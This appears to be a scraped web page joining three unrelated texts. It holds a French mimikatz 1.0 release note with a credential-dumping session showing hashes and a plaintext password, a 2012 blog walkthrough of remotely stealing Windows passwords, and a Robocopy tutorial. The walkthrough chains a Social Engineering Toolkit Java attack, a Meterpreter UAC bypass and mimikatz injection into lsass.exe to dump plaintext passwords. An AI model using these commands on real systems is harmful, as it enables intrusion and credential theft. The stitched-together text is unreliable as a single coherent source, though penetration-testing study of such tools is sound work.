mimikatz mimikatz 1.0 vient de sortir en version alpha beta RC !

Pour les pressés cherchant des mots de passe…

A exécuter en administrateur :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
mimikatz # privilege::debug
Demande d'ACTIVATION du privilège : SeDebugPrivilege : OK
mimikatz # sekurlsa::logonPasswords full
Authentification Id         : 0;234870
Package d'authentification  : NTLM
Utilisateur principal       : Gentil Kiwi
Domaine d'authentification  : vm-w8-rp-x
        msv1_0 :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Hash LM      : d0e9aee149655a6075e4540af1f22d3b
         * Hash NTLM    : cc36cf7a8514893efccd332446158b1a
        kerberos :
         * Utilisateur  : Gentil Kiwi
         * Domaine      : vm-w8-rp-x
         * Mot de passe : waza1234/
...

Modules

mimikatz est maintenant organisé autours de modules locaux :

  • "standard" ; commandes de base
  • crypto ; Cryptographie et certificats
  • sekurlsa ; Dump de hashes et de mots de passes Windows
  • system ; Gestion système
  • process ; Manipulation des processus
  • thread ; Manipulation des threads
  • service ; Manipulation des services
  • privilege ; Manipulation des privilèges
  • winmine ; Manipulation du démineur de Windows XP (démonstration)
  • minesweeper ; Manipulation du démineur de Windows Vista et 7 (démonstration)
  • nogpo ; Pour éviter quelques GPO triviales
  • samdump ; Dump de SAM offline
  • inject ; Injecteur de librairies
  • ts ; Manipulations Terminal Server
  • divers ; Fonctions diverses trop petites pour s’émanciper

A part pour le module « standard », la séparation du module et de la fonction appelée se fait avec le séparateur ::
Exemple : inject::process lsass.exe sekurlsa.dll

Librairies

Ce n’est pas forcément le plus discret, mais j’aime injecter des librairies

  • sekurlsa ; manipulation des données de sécurités dans LSASS
  • klock ; manipulation de bureaux
  • kelloworld ; libraire à injecter, pour l’exemple

Pilote

Être administrateur n’est pas toujours suffisant, il peut aussi être intéressant de disposer d’un point d’entrée en mode utilisateur.
Un pilote, mimikatz.sys est donc disponible.

Les commandes distantes peuvent être appelées en les précédants d’un :

  • @ pour les libraires (@ seul clos la connexion à la librairie, et la décharge)
  • ! pour le pilote mimikatz (! seul clos la connexion au pilote)

Remotely Recovering Windows Passwords in Plain Text

There has been a lot of buzz across the web the last few months about a program called “Mimikatz”. It is an interesting program that allows you to recover Windows passwords from a system in clear text. Why spend hours, days, or months trying to crack a complex password when you can just pull it from Windows memory as unencrypted text?

We have seen in the past that most Windows passwords less than 15 characters can be cracked in just a few seconds if the attacker can get the Windows Hashes. This is due to the fact that Windows stores these passwords in an easy to crack LM hash. An old encryption used for backwards compatibility. Microsoft allows you to disable the older LM Hash, but as Mike Pilkington discusses on the SANS blog, Microsoft still creates the hash and stores it in memory.

No big deal, just make your passwords 15 characters or greater and problem solved. The LM hash will not be created, only the more secure NTLM hash. Well, not so fast. It seems that the LM hash is not the only version of the passwords Windows keeps in memory, it also keeps a copy of the passwords in plain text.

Which you can even recover remotely…

Pauldotcom.com has a great article explaining how to use Mimikatz to recover remote passwords. In this example, I used the website Java attack through the Social Engineering Toolkit (SET) to obtain a remote shell. First thing you will want to do is download Mimikatz and place the files you need (Windows 32 or 64 bit) in a directory on your Backtrack system. Then run SET and pick the website java attack option.

After the target system surfs to our SET webpage and allows the Java code to run, we get a remote shell. After we connect to the created session, we will need to elevate our authority level. We need System level privileges for Mimikatz to work properly, so the first thing to do is run the Bypass UAC script in Meterpreter, and then connect to the newly created session, in this instance session 3:

Now all we need to do is create a directory on the target system and copy the Mimikatz files up to it:

Now we need to drop to a command shell and run “Mimikatz”.

You will now be in the Mimikatz program console and need to enter the commands “privilege::debug” and then “inject::process lsass.exe sekurlsa.dll”:

If you get an error at this point (Yeah I know, it is all in French), you probably don’t have System level authority.

Okay, if all went well, you need to run one last command, “@getLogonPasswords”:

And that is it! The passwords for anyone who has logged onto this machine will be displayed in plain text. From the picture above you can see two users:

Username: Fred
Password: password

Okay, not a complex (or smart) password, but look at the other user:

Username: Secure_User
Password: CvM*901D0?#(Fg[“MNoP43!Ta$cv2%

Wow, wouldn’t want to have to type that one in every day. That is a 30 character password and Mimikatz recovered and displayed it in plain text with no need to decrypt or crack.

The moral of this story boys and girls is to not allow scripts or programs to run from websites that you do not know or trust. Run a browser script blocking program like NoScript. Also, do not allow your Windows 7 users to use Administrator level accounts. Drop them down to User accounts for their everyday usage.

As always, do not access systems that you do not have permission to do so. And always do your penetration testing learning on test machines and not on live production systems.

 

~ by D. Dieterle on April 16, 2012.

Posted in Computer Security
Tags: , , , , , ,

How to use Robocopy command to copy folders and contents

Robocopy (Robust File Copy) is a command-line file copying tool in Windows Vista. Although Robocopy is available for free with the download Windows Resource Kit since Windows NT 4.0, it has never been an official feature of the operating system until the arrival of Vista. Unlike other built-in file copying commands such as Copy and XCopy, Robocopy is designed for reliable copy or mirroring of entire folders of any size, and in the copying process, ensure that all NTFS ACLS, attributes, owner information, alternate data streams, auditing information, timestamps and properties are copied except security information unless explicitly requested with /COPYALL switch.
And best of all, Robocopy works over network connections that are subject to disruption or outages with resume copying feature, and has progress indicator on the command line that is useful when copying large files.
Robocopy Syntax
ROBOCOPY source destination [file [file]…] [options]
where source is Source Directory (drive:\path or \\server\share\path), destination is Destination Directory (drive:\path or \\server\share\path) and file is File(s) to copy where names or wildcards can be specified and default is “*.*” (all files).
Robocopy Options and Switches
Copy options :
/S :: copy Subdirectories, but not empty ones.
/E :: copy subdirectories, including Empty ones.
/LEV:n :: only copy the top n LEVels of the source directory tree.
/Z :: copy files in restartable mode.
/B :: copy files in Backup mode.
/ZB :: use restartable mode; if access denied use Backup mode.
/EFSRAW :: copy all encrypted files in EFS RAW mode.
/COPY:copyflag[s] :: what to COPY for files (default is /COPY:DAT).
(copyflags : D=Data, A=Attributes, T=Timestamps).
(S=Security=NTFS ACLs, O=Owner info, U=aUditing info).
/DCOPY:T :: COPY Directory Timestamps.
/SEC :: copy files with SECurity (equivalent to /COPY:DATS).
/COPYALL :: COPY ALL file info (equivalent to /COPY:DATSOU).
/NOCOPY :: COPY NO file info (useful with /PURGE).
/SECFIX :: FIX file SECurity on all files, even skipped files.
/TIMFIX :: FIX file TIMes on all files, even skipped files.
/PURGE :: delete dest files/dirs that no longer exist in source.
/MIR :: MIRror a directory tree (equivalent to /E plus /PURGE).
/MOV :: MOVe files (delete from source after copying).
/MOVE :: MOVE files AND dirs (delete from source after copying).
Examples:
To use Robocopy is simple, just like how you would use Copy and Xcopy commands. For example, to copy entire folder of C:\Users to C:\UserBackup, simply type:
Robocopy C:\Users C:\UserBackup